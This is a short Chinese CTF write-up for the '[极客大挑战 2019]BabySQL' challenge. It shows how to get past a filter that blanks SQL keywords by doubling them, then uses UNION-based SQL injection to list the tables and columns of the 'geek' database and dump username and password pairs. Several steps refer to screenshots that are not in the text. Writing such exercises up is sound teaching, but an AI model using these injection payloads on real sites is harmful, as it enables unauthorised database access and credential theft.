[极客大挑战 2019]BabySQL

尝试万能密码

发现or被过滤了，被替换为空

我们可以这样绕过

发现可以登录成功

接下来就可以爆字段数了

发现报错

猜测by也被置空

尝试

 

 

 

说明字段数为3

输入

1' union select 1,2,database()#

发现也报错了，可能是过滤了union select

尝试

1' unionaa bbselect 1,2,database()#

发现

 

确实过滤了

尝试

1' ununionion seselectlect 1,2,database()#

得到数据库

爆破数据表

1' ununionion seselectlect 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek'#

  

发现被过滤了

通过尝试，发现过滤了from和where，当然还要注意information中的or

1' ununionion seselectlect 1,2,group_concat(table_name) ffromrom infoorrmation_schema.tables whwhereere table_schema='geek'#

爆破列

1' ununionion seselectlect 1,2,group_concat(column_name) ffromrom infoorrmation_schema.columns whwhereere table_name='b4bsql'#

 查询数据

1' ununionion seselectlect 1,2,group_concat(username,':',passwoorrd) ffromrom b4bsql#

得到flag